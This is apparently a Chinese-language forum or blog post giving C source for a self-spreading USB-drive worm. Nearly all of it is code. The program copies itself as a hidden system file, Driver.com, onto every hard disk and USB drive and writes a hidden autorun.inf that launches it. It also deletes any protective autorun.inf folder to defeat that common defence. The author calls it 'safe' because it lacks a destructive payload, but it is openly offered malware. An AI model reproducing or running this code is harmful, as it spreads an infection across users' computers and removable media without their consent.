一个简单的U盘小病毒

/// //一个简单的U盘小病毒，用C语言实现，没有破坏模块，很安全的。 //这是一个强化版本，可以突破autorun.inf文件夹防御策略。 //作者：冷却 //注意：此程序在用VC连接的时候要设置为多线程模式。 /// #include BOOL DeleteDirectory(char* DirName); void main() { HMODULE handle; HANDLE autorun; unsigned long autotextNum; int diskType; char virusfilePath[128]={0}; char driveList[128]={0}; char virusCopyFilePath[128]={0}; char *pDriveList=driveList; char autotext[]= "[AUTORUN]/r/n" "OPEN=Driver.com/r/n" "SHELL//OPEN=打开(&O)/r/n" "SHELL//OPEN//COMMAND=Driver.com/r/n" "SHELL//OPEN//DEFAULT=1/r/n" "SHELL//EXPLORE=资源管理器(&X)/r/n" "SHELL//EXPLORE//COMMAND=Driver.com/r/n"; handle = GetModuleHandle(NULL); //获取自身实例句柄 GetModuleFileName(handle,virusfilePath,sizeof(virusfilePath)); //获取自身完整路径 GetLogicalDriveStrings(sizeof(driveList),driveList); //获取磁盘列表 while(*pDriveList != NULL) { diskType = GetDriveType(pDriveList); //得到磁盘类型 if(diskType == DRIVE_FIXED || diskType ==DRIVE_REMOVABLE) //如果是硬盘或U盘则感染 { //复制自身 memset(virusCopyFilePath,0,sizeof(virusCopyFilePath)); strcpy(virusCopyFilePath,pDriveList); strcat(virusCopyFilePath,"Driver.com"); CopyFile(virusfilePath,virusCopyFilePath,false); SetFileAttributes(virusCopyFilePath,FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM); //设置文件属性 //写入autorun.inf memset(virusCopyFilePath,0,sizeof(virusCopyFilePath)); strcpy(virusCopyFilePath,pDriveList); strcat(virusCopyFilePath,"autorun.inf"); //如果存在autorun.inf文件夹，则首先将其删除。(突破autorun.inf文件夹防御策略!!!) DeleteDirectory(virusCopyFilePath); autorun = CreateFile(virusCopyFilePath,GENERIC_ALL,0,0,CREATE_NEW,FILE_ATTRIBUTE_HIDDEN,0); if(autorun != NULL) { WriteFile(autorun,&autotext,sizeof(autotext)-1,&autotextNum,0); SetFileAttributes(virusCopyFilePath,FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM); } } pDriveList += 4; //为了得到磁盘列表的下一项 } } //一个功能函数：删除指定目录 BOOL DeleteDirectory(char* DirName) { CFileFind tempFind; char tempFileFind[256]; sprintf(tempFileFind,"%s//*.*",DirName); BOOL IsFinded = tempFind.FindFile(tempFileFind); while(IsFinded) { IsFinded = tempFind.FindNextFile(); if(!tempFind.IsDots()) { char foundFileName[256]; strcpy(foundFileName,tempFind.GetFileName().GetBuffer(256)); if(tempFind.IsDirectory()) { char tempDir[256]; sprintf(tempDir,"%s//%s",DirName,foundFileName); DeleteDirectory(tempDir); } else { char tempFileName[256]; sprintf(tempFileName,"%s//%s",DirName,foundFileName); DeleteFile(tempFileName); } } } tempFind.Close(); if(!RemoveDirectory(DirName)) { return FALSE; } return TRUE; }